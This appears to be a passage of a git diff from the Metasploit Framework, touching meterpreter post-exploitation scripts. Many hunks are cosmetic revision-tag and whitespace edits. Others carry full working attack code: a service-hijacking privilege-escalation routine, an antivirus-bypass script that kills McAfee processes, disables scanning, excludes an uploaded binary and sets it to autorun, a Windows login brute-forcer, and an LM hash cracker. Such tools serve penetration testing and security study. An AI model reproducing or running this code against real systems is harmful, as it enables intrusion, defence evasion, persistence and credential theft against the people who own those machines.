+ #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
+ if(newservice["return"] != 0)
+ print_status("Created service... #{newservice["return"]}")
+ ret = adv.StartServiceA(newservice["return"], 0, nil)
+ print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
+ service_delete("walservice")
+ adv.CloseServiceHandle(newservice["return"])
+ if aggressive == false
+ adv.CloseServiceHandle(manag["return"])
+ raise Rex::Script::Completed
+ end
+ else
+ print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
+ end
+else
+ print_status("No privs to create a service...")
+ manag = adv.OpenSCManagerA(nil,nil,1)
+ if(manag["return"] == 0)
+ print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
+ end
+end
+print_status("Trying to find weak permissions in existing services..")
+#Search through list of services to find weak permissions, whether file or config
+serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
+#for each service
+service_list.each do |serv|
+ begin
+ srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
+ if srvtype != "16"
+ continue
+ end
+ moved = false
+ configed = false
+ #default path, but there should be an ImagePath registry key
+ source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
+ #get path to exe; parse out quotes and arguments
+ sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
+ sourcemaybe = client.fs.file.expand_path(sourceorig)
+ if( sourcemaybe[0] == '"' )
+ sourcemaybe = sourcemaybe.split('"')[1]
+ else
+ sourcemaybe = sourcemaybe.split(' ')[0]
+ end
+ begin
+ client.fs.file.stat(sourcemaybe) #check if it really exists
+ source = sourcemaybe
+ rescue
+ print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
+ end
+ #try to exploit weak file permissions
+ if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
+ client.railgun.kernel32.CopyFileA(tempexe, source, false)
+ print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
+ moved = true
+ end
+ #try to exploit weak config permissions
+ #open with SERVICE_CHANGE_CONFIG (0x0002)
+ servhandleret = adv.OpenServiceA(manag["return"],serv,2)
+ if(servhandleret["return"] != 0)
+ #SERVICE_NO_CHANGE is 0xFFFFFFFF
+ if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
+ print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
+ configed = true
+ end
+ adv.CloseServiceHandle(servhandleret["return"])
+
+ end
+ if(moved != true && configed != true)
+ print_status("No exploitable weak permissions found on #{serv}")
+ continue
+ end
+ print_status("Restarting #{serv}")
+ #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
+ servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
+ if(servhandleret["return"] != 0)
+ #SERVICE_CONTROL_STOP = 0x00000001
+ if(adv.ControlService(servhandleret["return"],1,56))
+ client.railgun.kernel32.Sleep(1000)
+ adv.StartServiceA(servhandleret["return"],0,nil)
+ print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
+ #Cleanup
+ if moved == true
+ client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
+ end
+ if configed == true
+ servhandleret = adv.OpenServiceA(manag["return"],serv,2)
+ adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
+ adv.CloseServiceHandle(servhandleret["return"])
+ end
+ if aggressive == false
+ raise Rex::Script::Completed
+ end
+ else
+ print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
+ end
+ adv.CloseServiceHandle(servhandleret["return"])
+ else
+ print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
+ end
+ rescue
+ end
+end
+
diff --git a/scripts/meterpreter/sound_recorder.rb b/scripts/meterpreter/sound_recorder.rb
index 1a6a6c75ce..f9a75fa61e 100644
--- a/scripts/meterpreter/sound_recorder.rb
+++ b/scripts/meterpreter/sound_recorder.rb
@@ -80,7 +80,7 @@ end
}
# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
+wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
# Create Folder for logs and get path for logs
if not log_folder
diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb
index dd11c7c4db..dc659d132e 100644
--- a/scripts/meterpreter/srt_webdrive_priv.rb
+++ b/scripts/meterpreter/srt_webdrive_priv.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
@@ -63,7 +64,8 @@ opts.parse(args) do |opt, idx, val|
# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
- client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
+ client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
+ nil, {'Hidden' => 'true'})
end
end
raise Rex::Script::Completed
diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
index 1c7be60da4..26ce4672e4 100644
--- a/scripts/meterpreter/uploadexec.rb
+++ b/scripts/meterpreter/uploadexec.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
session = client
@@exec_opts = Rex::Parser::Arguments.new(
diff --git a/scripts/meterpreter/virtualbox_sysenter_dos.rb b/scripts/meterpreter/virtualbox_sysenter_dos.rb
index 147ad65020..a472d42035 100644
--- a/scripts/meterpreter/virtualbox_sysenter_dos.rb
+++ b/scripts/meterpreter/virtualbox_sysenter_dos.rb
@@ -3,6 +3,8 @@
# Meterpreter script for triggering the VirtualBox DoS published at:
# http://milw0rm.com/exploits/9323
+# $Revision$
+
opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ]
)
diff --git a/scripts/meterpreter/virusscan_bypass.rb b/scripts/meterpreter/virusscan_bypass.rb
old mode 100755
new mode 100644
index da0fc22ac2..33508b76e5
--- a/scripts/meterpreter/virusscan_bypass.rb
+++ b/scripts/meterpreter/virusscan_bypass.rb
@@ -1,205 +1,208 @@
-# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
-# order which keeps VirusScan icon visible at system tray without disabled sign on it.
-# Additionally it lets you disable On Access Scanner from registry, upload your detectable
-# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
-# registry key. (Requires administrator privilege. Tested on XP SP3)
-#
-# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
-#
-# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
-
-session = client
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-k" => [ false,"Only kills VirusScan processes"],
- "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
-)
-
-################## function declaration Declarations ##################
-def usage()
- print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
- print_line "----------------------------------------------------------------------------------------------"
- print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
- print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
- print_line "----------------------------------------------------------------------------------------------"
- print_line(@@exec_opts.usage)
-end
-
-@path = ""
-@location = ""
-
-def upload(session,file,trgloc)
- if not ::File.exists?(file)
- raise "File to Upload does not exists!"
- else
- @location = session.fs.file.expand_path("%TEMP%")
- begin
- ext = file.scan(/\S*(.exe)/i)
- if ext.join == ".exe"
- fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
- else
- fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
- end
- @path = fileontrgt
- print_status("Uploading #{file}....")
- session.fs.file.upload_file("#{fileontrgt}","#{file}")
- print_status("Uploaded as #{fileontrgt}")
- rescue ::Exception => e
- print_status("Error uploading file #{file}: #{e.class} #{e}")
- end
- end
- return fileontrgt
-end
-
-#parsing of Options
-file = ""
-helpcall = 0
-killonly = 0
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-e"
- file = val || ""
- when "-h"
- helpcall = 1
- when "-k"
- killonly = 1
- end
-
-}
-
-if killonly == 0
- if file == ""
- usage
- raise Rex::Script::Completed
- end
-end
-
-# Magic kill order :)
-avs = %W{
- shstat.exe
- engineserver.exe
- frameworkservice.exe
- naprdmgr.exe
- mctray.exe
- mfeann.exe
- vstskmgr.exe
- mcshield.exe
-}
-
-av = 0
-
-plist = client.sys.process.get_processes()
-plist.each do |x|
- if (avs.index(x['name'].downcase))
- av = av + 1
- end
-end
-
-
-if av > 6
- print_status("VirusScan Enterprise v8.7.0i+ is running...")
-else
- print_status("VirusScan Enterprise v8.7.0i+ is not running!")
- raise Rex::Script::Completed
-end
-
-target_pid = nil
-target ||= "mfevtps.exe"
-
-print_status("Migrating to #{target}...")
-
-# Get the target process pid
-target_pid = client.sys.process[target]
-
-if not target_pid
- print_error("Could not access the target process")
- raise Rex::Script::Completed
-end
-
-print_status("Migrating into process ID #{target_pid}")
-client.core.migrate(target_pid)
-
-target_pid = nil
-
-if killonly == 1
- avs.each do |x|
- # Get the target process pid
- target_pid = client.sys.process[x]
- print_status("Killing off #{x}...")
- client.sys.process.kill(target_pid)
- end
-else
- avs.each do |x|
- # Get the target process pid
- target_pid = client.sys.process[x]
- print_status("Killing off #{x}...")
- client.sys.process.kill(target_pid)
- end
-
- # Upload it
- exec = upload(session,file,"")
-
- # Initiailze vars
- key = nil
- value = nil
- data = nil
- type = nil
-
- # Mcafee registry key
- key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
-
- # Split the key into its parts
- root_key, base_key = client.sys.registry.splitkey(key)
-
- # Disable when writing to disk option
- value = "bScanIncoming"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Disable when reading from disk option
- value = "bScanOutgoing"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Disable detection of unwanted programs
- value = "ApplyNVP"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Increase the number of excluded items
- value = "NumExcludeItems"
- data = 1
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Add executable to excluded item folder
- value = "ExcludedItem_0"
- data = "3|3|" + @location
- type = "REG_SZ"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Set registry to run executable at startup
- key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
- # Split the key into its parts
- root_key, base_key = client.sys.registry.splitkey(key)
- value = "MS"
- data = @path
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-end
-
-print_status("Finished!")
+# $Id$
+# $Revision$
+
+# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
+# order which keeps VirusScan icon visible at system tray without disabled sign on it.
+# Additionally it lets you disable On Access Scanner from registry, upload your detectable
+# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
+# registry key. (Requires administrator privilege. Tested on XP SP3)
+#
+# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
+#
+# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
+
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+ "-h" => [ false,"Help menu." ],
+ "-k" => [ false,"Only kills VirusScan processes"],
+ "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
+)
+
+################## function declaration Declarations ##################
+def usage()
+ print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
+ print_line "----------------------------------------------------------------------------------------------"
+ print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
+ print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
+ print_line "----------------------------------------------------------------------------------------------"
+ print_line(@@exec_opts.usage)
+end
+
+@path = ""
+@location = ""
+
+def upload(session,file,trgloc)
+ if not ::File.exists?(file)
+ raise "File to Upload does not exists!"
+ else
+ @location = session.fs.file.expand_path("%TEMP%")
+ begin
+ ext = file.scan(/\S*(.exe)/i)
+ if ext.join == ".exe"
+ fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
+ else
+ fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
+ end
+ @path = fileontrgt
+ print_status("Uploading #{file}....")
+ session.fs.file.upload_file("#{fileontrgt}","#{file}")
+ print_status("Uploaded as #{fileontrgt}")
+ rescue ::Exception => e
+ print_status("Error uploading file #{file}: #{e.class} #{e}")
+ end
+ end
+ return fileontrgt
+end
+
+#parsing of Options
+file = ""
+helpcall = 0
+killonly = 0
+@@exec_opts.parse(args) { |opt, idx, val|
+ case opt
+ when "-e"
+ file = val || ""
+ when "-h"
+ helpcall = 1
+ when "-k"
+ killonly = 1
+ end
+
+}
+
+if killonly == 0
+ if file == ""
+ usage
+ raise Rex::Script::Completed
+ end
+end
+
+# Magic kill order :)
+avs = %W{
+ shstat.exe
+ engineserver.exe
+ frameworkservice.exe
+ naprdmgr.exe
+ mctray.exe
+ mfeann.exe
+ vstskmgr.exe
+ mcshield.exe
+}
+
+av = 0
+
+plist = client.sys.process.get_processes()
+plist.each do |x|
+ if (avs.index(x['name'].downcase))
+ av = av + 1
+ end
+end
+
+
+if av > 6
+ print_status("VirusScan Enterprise v8.7.0i+ is running...")
+else
+ print_status("VirusScan Enterprise v8.7.0i+ is not running!")
+ raise Rex::Script::Completed
+end
+
+target_pid = nil
+target ||= "mfevtps.exe"
+
+print_status("Migrating to #{target}...")
+
+# Get the target process pid
+target_pid = client.sys.process[target]
+
+if not target_pid
+ print_error("Could not access the target process")
+ raise Rex::Script::Completed
+end
+
+print_status("Migrating into process ID #{target_pid}")
+client.core.migrate(target_pid)
+
+target_pid = nil
+
+if killonly == 1
+ avs.each do |x|
+ # Get the target process pid
+ target_pid = client.sys.process[x]
+ print_status("Killing off #{x}...")
+ client.sys.process.kill(target_pid)
+ end
+else
+ avs.each do |x|
+ # Get the target process pid
+ target_pid = client.sys.process[x]
+ print_status("Killing off #{x}...")
+ client.sys.process.kill(target_pid)
+ end
+
+ # Upload it
+ exec = upload(session,file,"")
+
+ # Initiailze vars
+ key = nil
+ value = nil
+ data = nil
+ type = nil
+
+ # Mcafee registry key
+ key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
+
+ # Split the key into its parts
+ root_key, base_key = client.sys.registry.splitkey(key)
+
+ # Disable when writing to disk option
+ value = "bScanIncoming"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Disable when reading from disk option
+ value = "bScanOutgoing"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Disable detection of unwanted programs
+ value = "ApplyNVP"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Increase the number of excluded items
+ value = "NumExcludeItems"
+ data = 1
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Add executable to excluded item folder
+ value = "ExcludedItem_0"
+ data = "3|3|" + @location
+ type = "REG_SZ"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Set registry to run executable at startup
+ key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
+ # Split the key into its parts
+ root_key, base_key = client.sys.registry.splitkey(key)
+ value = "MS"
+ data = @path
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+end
+
+print_status("Finished!")
diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb
index 010f1a4ab1..9e9795b937 100644
--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for obtaining a quick VNC session
diff --git a/scripts/meterpreter/webcam.rb b/scripts/meterpreter/webcam.rb
index e0637847dc..5111081670 100644
--- a/scripts/meterpreter/webcam.rb
+++ b/scripts/meterpreter/webcam.rb
@@ -2,7 +2,7 @@
# $Revision$
# Author: scriptjunkie
#
-# Simplify running webcam, whether grabbing a single frame or running
+# Simplify running webcam, whether grabbing a single frame or running
# a continous loop.
@client = client
@@ -66,7 +66,7 @@ begin
end
print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}")
client.webcam.webcam_start(index)
-
+
#prepare output
if(gui)
sock = Rex::Socket::Udp.create(
diff --git a/scripts/meterpreter/win32-sshclient.rb b/scripts/meterpreter/win32-sshclient.rb
index 8b06684b38..1ce149edc3 100644
--- a/scripts/meterpreter/win32-sshclient.rb
+++ b/scripts/meterpreter/win32-sshclient.rb
@@ -1,6 +1,7 @@
# win32-sshclient.rb
#
# $Id$
+# $Revision$
#
# Meterpreter script to deploy & run the "plink" commandline ssh-client
# supports only MS-Windows-2k/XP/Vista Hosts
diff --git a/scripts/meterpreter/win32-sshserver.rb b/scripts/meterpreter/win32-sshserver.rb
index 12266ab497..902b85d893 100644
--- a/scripts/meterpreter/win32-sshserver.rb
+++ b/scripts/meterpreter/win32-sshserver.rb
@@ -1,6 +1,7 @@
# win32-sshserver.rb
#
# $Id$
+# $Revision$
#
# meterpreter-script to deploy + run OpenSSH
# on the target machine
diff --git a/scripts/meterpreter/winbf.rb b/scripts/meterpreter/winbf.rb
index 2ce1fe1328..3cc3ae5af3 100644
--- a/scripts/meterpreter/winbf.rb
+++ b/scripts/meterpreter/winbf.rb
@@ -4,12 +4,12 @@
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "\tHelp menu."],
- "-t" => [ true, "\tTarget IP Address"],
- "-p" => [ true, "\tPassword List"],
- "-cp" => [ false, "\tCheck Local Machine Password Policy"],
- "-L" => [ true, "\tUsername List to be brute forced"],
- "-l" => [ true, "\tLogin name to be brute forced"]
+ "-h" => [ false, "\tHelp menu."],
+ "-t" => [ true, "\tTarget IP Address"],
+ "-p" => [ true, "\tPassword List"],
+ "-cp" => [ false, "\tCheck Local Machine Password Policy"],
+ "-L" => [ true, "\tUsername List to be brute forced"],
+ "-l" => [ true, "\tLogin name to be brute forced"]
)
# Variables for Options
user = []
@@ -66,56 +66,56 @@ end
def passbf(session,passlist,target,user,opt,logfile)
print_status("Running Brute force attack against #{user}")
print_status("Successfull Username and Password pairs are being saved in #{logfile}")
- result = []
+ result = []
output = []
passfnd = 0
- a = []
+ a = []
i = 0
if opt == 1
if not ::File.exists?(user)
raise "Usernames List File does not exists!"
- else
- user = ::File.open(user, "r")
- end
+ else
+ user = ::File.open(user, "r")
+ end
end
# Go thru each user
user.each do |u|
# Go thru each line in the password file
while passfnd < 1
::File.open(passlist, "r").each_line do |line|
- begin
- print_status("Trying #{u.chomp} #{line.chomp}")
+ begin
+ print_status("Trying #{u.chomp} #{line.chomp}")
+
+ # Command for testing local login credentials
+ r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ output << d
+ end
+ r.channel.close
+ r.close
+
+ # Checks if password is found
+ result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
+ if result.length == 1
+ print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")
+ file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")
+ r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ output << d
+ end
+ output.clear
+ r.channel.close
+ r.close
+ passfnd = 1
+ break
+ end
+ rescue ::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
- # Command for testing local login credentials
- r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- output << d
- end
- r.channel.close
- r.close
-
- # Checks if password is found
- result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
- if result.length == 1
- print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")
- file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")
- r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- output << d
- end
- output.clear
- r.channel.close
- r.close
- passfnd = 1
- break
- end
- rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
-
- end
- passfnd = 1
- end
+ end
+ passfnd = 1
+ end
passfnd = 0
end
end
@@ -152,33 +152,31 @@ unsupported if client.platform !~ /win32|win64/i
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
- when "-l"
- user << val
- ulopt = 0
- when "-L"
- userlist = val
- ulopt = 1
-
- when "-cp"
- chkpolicy(session)
- exit
- when "-p"
-
- passlist = val
- if not ::File.exists?(passlist)
- raise "Password File does not exists!"
- end
- when "-t"
- target = val
- when "-h"
- print(
- "Windows Login Brute Force Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
- helpcall = 1
- end
-
+ when "-l"
+ user << val
+ ulopt = 0
+ when "-L"
+ userlist = val
+ ulopt = 1
+
+ when "-cp"
+ chkpolicy(session)
+ exit
+ when "-p"
+
+ passlist = val
+ if not ::File.exists?(passlist)
+ raise "Password File does not exists!"
+ end
+ when "-t"
+ target = val
+ when "-h"
+ print("Windows Login Brute Force Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
+ helpcall = 1
+ end
+
}
# Execution of options selected
@@ -191,11 +189,9 @@ elsif userlist != nil && passlist != nil && target != nil
passbf(session,passlist,target,userlist,ulopt,logme(target))
elsif helpcall == 0
+ print("Windows Login Brute Force Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
- print(
- "Windows Login Brute Force Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
end
diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb
index 8a1bd40653..b91b553545 100644
--- a/scripts/meterpreter/wmic.rb
+++ b/scripts/meterpreter/wmic.rb
@@ -28,7 +28,7 @@ def wmicexec(session,wmiccmds= nil)
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"
- puts wmicfl
+ print_line wmicfl
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finishes before executing next wmic command
@@ -77,7 +77,7 @@ end
def usage
print_line("Windows WMIC Command Execution Meterpreter Script ")
- puts @@exec_opts.usage
+ print_line @@exec_opts.usage
print_line("USAGE:")
print_line("run wmic -c \"WMIC Command Argument\"\n")
print_line("NOTE:")
diff --git a/scripts/shell/migrate.rb b/scripts/shell/migrate.rb
index 1dd96c9e15..327fef8a3a 100644
--- a/scripts/shell/migrate.rb
+++ b/scripts/shell/migrate.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Simply print a message that migrating is not supported on CommandShell sessions...
#
diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb
index 672e8adc50..e6fa404769 100644
--- a/scripts/shell/spawn_meterpreter.rb
+++ b/scripts/shell/spawn_meterpreter.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Spawn a meterpreter session using an existing command shell session
#
diff --git a/tools/import_webscarab.rb b/tools/import_webscarab.rb
index 10b0bff8f5..9a8ab88c49 100755
--- a/tools/import_webscarab.rb
+++ b/tools/import_webscarab.rb
@@ -52,7 +52,8 @@ puts("Opening database file: #{db_file}")
database = SQLite3::Database.new(db_file)
# Prepare the insert statement...
-insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created) VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)");
+insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created)" +
+ " VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)");
# target hash -> Resolving dns names is soooo slow, I don't know why. So we use the
# following hash as a "micro hosts", so we don't have to call getaddress each time...
diff --git a/tools/list_interfaces.rb b/tools/list_interfaces.rb
index 5a59f45beb..bc649e192c 100755
--- a/tools/list_interfaces.rb
+++ b/tools/list_interfaces.rb
@@ -1,9 +1,9 @@
#!/usr/bin/env ruby
#
-# $Id:$
-# $Revision:$
+# $Id$
+# $Revision$
#
-# This small utility will display all the informations about the network interfaces
+# This small utility will display all the informations about the network interfaces
# that one can use under Windows with modules using pcaprub and having the INTERFACE option (ex: arp_poisonning, arp_sweep, ...).
# To use th interface option under Windows use the Index value displayed by this tool (ex: "SET INTERFACE 1")
#
@@ -19,14 +19,14 @@ if RUBY_PLATFORM == "i386-mingw32"
Pcap.respond_to?(:interfaces) and
Pcap.respond_to?(:addresses))
$stderr.puts "Error: Looks like you are not running the latest version of pcaprub"
- exit
+ exit
end
found = false
Pcap.interfaces.each_with_index do |iface, i|
found = true
detail = Pcap.interface_info(iface)
addr = Pcap.addresses(iface)
- puts "#" * 70
+ puts "#" * 70
puts ""
puts "INDEX : " + (i + 1).to_s
puts "NAME : " + detail["name"]
diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb
index eba6063b9e..9ff9bdebb3 100755
--- a/tools/lm2ntcrack.rb
+++ b/tools/lm2ntcrack.rb
@@ -68,7 +68,7 @@ $args.parse(ARGV) { |opt, idx, val|
end
}
-if not type
+if not type
usage
else
if pass and (not (hash or list))
@@ -77,20 +77,20 @@ else
mode = PASS_MODE
elsif list and hash and not pass
mode = BRUTE_MODE
- if not File.exist? list
- $stderr.puts "[*] The passwords list file does not exist"
+ if not File.exist? list
+ $stderr.puts "[*] The passwords list file does not exist"
exit
end
- if not File.file? list
- $stderr.puts "[*] The passwords list provided is not a file"
+ if not File.file? list
+ $stderr.puts "[*] The passwords list provided is not a file"
exit
end
- if not File.readable? list
- $stderr.puts "[*] The passwords list file is not readable"
+ if not File.readable? list
+ $stderr.puts "[*] The passwords list file is not readable"
exit
end
else
- usage
+ usage
end
end
@@ -112,8 +112,8 @@ elsif type == "NETNTLM2_SESSION" then
end
end
-case type
-when "HALFLM"
+case type
+when "HALFLM"
case mode
when BRUTE_MODE
if not hash =~ /^([a-fA-F0-9]{16})$/
@@ -122,18 +122,18 @@ when "HALFLM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
- if password =~ /^.{1,7}$/
+ if password =~ /^.{1,7}$/
puts password
- calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase
+ calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase
if calculatedhash == hash.upcase
found = true
match_password = password
break
end
- end
+ end
end
end
if found
@@ -170,7 +170,7 @@ when "HALFLM"
end
end
-when "LM"
+when "LM"
case mode
when BRUTE_MODE
if not hash =~ /^([a-fA-F0-9]{32})$/
@@ -179,7 +179,7 @@ when "LM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
